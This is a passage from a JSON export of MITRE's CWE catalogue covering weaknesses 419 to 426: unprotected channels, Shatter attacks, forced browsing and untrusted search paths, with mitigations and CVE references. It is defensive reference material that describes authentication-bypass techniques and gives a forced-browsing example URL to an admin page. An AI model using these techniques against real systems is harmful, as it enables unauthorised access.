Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Relationships, Taxonomy_Mappings, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Relationships"}]}},"419":{"attr":{"@_ID":"419","@_Name":"Unprotected Primary Channel","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software uses a primary channel for administration or restricted functionality, but it does not properly protect the channel.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"923","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":["Gain Privileges or Assume Identity","Bypass Protection Mechanism"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Do not expose administrative functionnality on the user UI."},{"Phase":"Architecture and Design","Description":"Protect the administrative/restricted functionality with a strong authentication mechanism."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Unprotected Primary Channel"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"383"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"}]}},"420":{"attr":{"@_ID":"420","@_Name":"Unprotected Alternate Channel","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software protects a primary channel, but it does not use the same level of protection for an alternate channel.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"923","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":["Gain Privileges or Assume Identity","Bypass Protection Mechanism"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Identify all alternate channels and use the same protection mechanisms that are used for the primary channels."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0567","Description":"DB server assumes that local clients have performed authentication, allowing attacker to directly connect to a process to load libraries and execute commands; a socket interface also exists (another alternate channel), so attack can be remote.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0567"},{"Reference":"CVE-2002-1578","Description":"Product does not restrict access to underlying database, so attacker can bypass restrictions by directly querying the database.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1578"},{"Reference":"CVE-2003-1035","Description":"User can avoid lockouts by using an API instead of the GUI to conduct brute force password guessing.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1035"},{"Reference":"CVE-2002-1863","Description":"FTP service can not be disabled even when other access controls would require it.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1863"},{"Reference":"CVE-2002-0066","Description":"Windows named pipe created without authentication/access control, allowing configuration modification.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0066"},{"Reference":"CVE-2004-1461","Description":"Router management interface spawns a separate TCP connection after authentication, allowing hijacking by attacker coming from the same IP address.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1461"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Unprotected Alternate Channel"}},"Notes":{"Note":{"#text":"This can be primary to authentication errors, and resultant from unhandled error conditions.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Applicable_Platforms, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"421":{"attr":{"@_ID":"421","@_Name":"Race Condition During Access to Alternate Channel","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product opens an alternate channel to communicate with an authorized user, but the channel is accessible to other actors.","Extended_Description":"This creates a race condition that allows an attacker to access the channel before the authorized user does.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"420","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"362","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design"}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":["Gain Privileges or Assume Identity","Bypass Protection Mechanism"]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-1999-0351","Description":"FTP \\"Pizza Thief\\" vulnerability. Attacker can connect to a port that was intended for use by another client.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0351"},{"Reference":"CVE-2003-0230","Description":"Product creates Windows named pipe during authentication that another attacker can hijack by connecting to it.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0230"}]},"Affected_Resources":{"Affected_Resource":"System Process"},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Alternate Channel Race Condition"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-354"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 13: Race Conditions.&#34; Page 205"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Observed_Example, Other_Notes, Taxonomy_Mappings, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Alternate Channel Race Condition","attr":{"@_Date":"2008-04-11"}}}},"422":{"attr":{"@_ID":"422","@_Name":"Unprotected Windows Messaging Channel (\'Shatter\')","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not properly verify the source of a message in the Windows Messaging System while running at elevated privileges, creating an alternate channel through which an attacker can directly send a message to the product.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"420","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"360","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design"}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":["Gain Privileges or Assume Identity","Bypass Protection Mechanism"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Always verify and authenticate the source of the message."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0971","Description":"Bypass GUI and access restricted dialog box.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0971"},{"Reference":"CVE-2002-1230","Description":"Gain privileges via Windows message.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1230"},{"Reference":"CVE-2003-0350","Description":"A control allows a change to a pointer for a callback function using Windows message.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0350"},{"Reference":"CVE-2003-0908","Description":"Product launches Help functionality while running with raised privileges, allowing command execution using Windows message to access \\"open file\\" dialog.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0908"},{"Reference":"CVE-2004-0213","Description":"Attacker uses Shatter attack to bypass GUI-enforced protection for CVE-2003-0908.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0213"},{"Reference":"CVE-2004-0207","Description":"User can call certain API functions to modify certain properties of privileged programs.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0207"}]},"Affected_Resources":{"Affected_Resource":"System Process"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Unprotected Windows Messaging Channel (\'Shatter\')"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP30","Entry_Name":"Missing endpoint authentication"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-402"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 2, &#34;Design Review.&#34; Page 34"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 12, &#34;Shatter Attacks&#34;, Page 694"}}]},"Notes":{"Note":[{"#text":"Overlaps privilege errors and UI errors.","attr":{"@_Type":"Relationship"}},{"attr":{"@_Type":"Research Gap"},"xhtml:p":["Possibly under-reported, probably under-studied. It is suspected that a number of publicized vulnerabilities that involve local privilege escalation on Windows systems may be related to Shatter attacks, but they are not labeled as such.","Alternate channel attacks likely exist in other operating systems and messaging models, e.g. in privileged X Windows applications, but examples are not readily available."]}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Other_Notes, Relationship_Notes, Research_Gaps"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"423":{"attr":{"@_ID":"423","@_Name":"DEPRECATED: Proxied Trusted Channel","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Deprecated"},"Description":"This entry has been deprecated because it was a duplicate of CWE-441. All content has been transferred to CWE-441.","Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-05","Modification_Comment":"deprecated this entry as a duplicate of 441"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Applicable_Platforms, Description, Name, Other_Notes, Potential_Mitigations, Relationships, Taxonomy_Mappings, Time_of_Introduction, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Name"}],"Previous_Entry_Name":[{"#text":"Proxied Trusted Channel","attr":{"@_Date":"2008-11-24"}},{"#text":"DEPRECATED (Duplicate): Proxied Trusted Channel","attr":{"@_Date":"2021-07-20"}}]}},"424":{"attr":{"@_ID":"424","@_Name":"Improper Protection of Alternate Path","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product does not sufficiently protect all possible paths that a user can take to access restricted functionality or resources.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"638","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design"}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":["Bypass Protection Mechanism","Gain Privileges or Assume Identity"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Deploy different layers of protection to implement security in depth."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Alternate Path Errors"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP35","Entry_Name":"Insecure resource access"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"127"}},{"attr":{"@_CAPEC_ID":"554"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Alternate Path Errors","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Protect Alternate Path","attr":{"@_Date":"2010-12-13"}}]}},"425":{"attr":{"@_ID":"425","@_Name":"Direct Request (\'Forced Browsing\')","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The web application does not adequately enforce appropriate authorization on all restricted URLs, scripts, or files.","Extended_Description":"Web applications susceptible to direct request attacks often make the false assumption that such resources can only be reached through a given navigation path and so only apply authorization at certain points in the path.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"862","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"862","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"288","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"424","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"471","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"98","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Web Based","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"forced browsing","Description":"The \\"forced browsing\\" term could be misinterpreted to include weaknesses such as CSRF or XSS, so its use is discouraged."}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control"],"Impact":["Read Application Data","Modify Application Data","Execute Unauthorized Code or Commands","Gain Privileges or Assume Identity"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":["Architecture and Design","Operation"],"Description":"Apply appropriate access control authorizations for each access to all restricted URLs, scripts or files."},{"Phase":"Architecture and Design","Description":"Consider using MVC based frameworks such as Struts."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"If forced browsing is possible, an attacker may be able to directly access a sensitive page by entering a URL similar to the following.","Example_Code":{"attr":{"@_Nature":"attack","@_Language":"JSP"},"xhtml:div":"http://somesite.com/someapplication/admin.jsp"}}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2004-2144","Description":"Bypass authentication via direct request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2144"},{"Reference":"CVE-2005-1892","Description":"Infinite loop or infoleak triggered by direct requests.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1892"},{"Reference":"CVE-2004-2257","Description":"Bypass auth/auth via direct request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2257"},{"Reference":"CVE-2005-1688","Description":"Direct request leads to infoleak by error.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1688"},{"Reference":"CVE-2005-1697","Description":"Direct request leads to infoleak by error.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1697"},{"Reference":"CVE-2005-1698","Description":"Direct request leads to infoleak by error.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1698"},{"Reference":"CVE-2005-1685","Description":"Authentication bypass via direct request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1685"},{"Reference":"CVE-2005-1827","Description":"Authentication bypass via direct request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1827"},{"Reference":"CVE-2005-1654","Description":"Authorization bypass using direct request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1654"},{"Reference":"CVE-2005-1668","Description":"Access privileged functionality using direct request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1668"},{"Reference":"CVE-2002-1798","Description":"Upload arbitrary files via direct request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1798"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Direct Request aka \'Forced Browsing\'"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A10","Entry_Name":"Failure to Restrict URL Access","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A1","Entry_Name":"Unvalidated Input","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A2","Entry_Name":"Broken Access Control","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":34,"Entry_Name":"Predictable Resource Location"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP30","Entry_Name":"Missing endpoint authentication"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"127"}},{"attr":{"@_CAPEC_ID":"668"}},{"attr":{"@_CAPEC_ID":"87"}}]},"Notes":{"Note":[{"#text":"Overlaps Modification of Assumed-Immutable Data (MAID), authorization errors, container errors; often primary to other weaknesses such as XSS and SQL injection.","attr":{"@_Type":"Relationship"}},{"#text":"\\"Forced browsing\\" is a step-based manipulation involving the omission of one or more steps, whose order is assumed to be immutable. The application does not verify that the first step was performed successfully before the second step. The consequence is typically \\"authentication bypass\\" or \\"path disclosure,\\" although it can be primary to all kinds of weaknesses, especially in languages such as PHP, which allow external modification of assumed-immutable variables.","attr":{"@_Type":"Theoretical"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Alternate_Terms, Relationships, Relationship_Notes, Taxonomy_Mappings, Theoretical_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Applicable_Platforms, Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}]}},"426":{"attr":{"@_ID":"426","@_Name":"Untrusted Search Path","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Stable"},"Description":"The application searches for critical resources using an externally-supplied search path that can point to resources that are not under the application\'s direct control.","Extended_Description":{"xhtml:p":["This might allow attackers to execute their own programs, access unauthorized data files, or modify configuration in unexpected ways. If the application uses a search path to locate critical resources such as programs, then an attacker could modify that search path to point to a malicious program, which the targeted application would then execute. The problem extends to any type of critical resource that the application trusts.","Some of the most common variants of untrusted search path are:"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["In various UNIX and Linux-based systems, the PATH environment variable may be consulted to locate executable programs, and LD_PRELOAD may be used to locate a separate library.","In various Microsoft-based systems, the PATH environment variable is 